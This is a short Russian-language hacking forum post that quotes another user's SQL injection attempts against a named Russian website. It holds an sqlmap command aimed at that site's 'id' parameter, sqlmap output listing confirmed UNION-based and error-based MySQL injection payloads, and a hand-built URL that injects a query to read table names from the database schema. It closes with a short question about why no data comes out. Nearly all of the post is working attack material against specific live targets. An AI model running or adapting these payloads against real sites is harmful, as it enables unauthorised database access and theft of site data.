13.03.2012, 23:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от xcedz
xcedz said:
1
sqlmap.py -u "http://zapoved.ru/?act=docs_more&id=3" -p "id" --random-agent --technique=EU --dbms=mysql -v 3
Код:
Code:
Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: act=docs_more&id=3') UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7174643a,0x4b686a6b476d6f6d504f,0x3a7172763a)# AND ('DzDB'='DzDB Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, [QUERY]#
2
Код:
Code:
Place: GET Parameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: mod=resource&id=31 AND (SELECT 4325 FROM(SELECT COUNT(*),CONCAT(0x3a7361633a,(SELECT (CASE WHEN (4325=4325) THEN 1 ELSE 0 END)),0x3a6f62653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) ---
3
субд Firebird хз над поковырять а чего не получается ничего вывести?
http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1 ,table_name,3,4,5,6,7+from+information_schema.tabl es+limit+0,1+and+%28%27DzDB%27=%27DzDB
|
|
|
|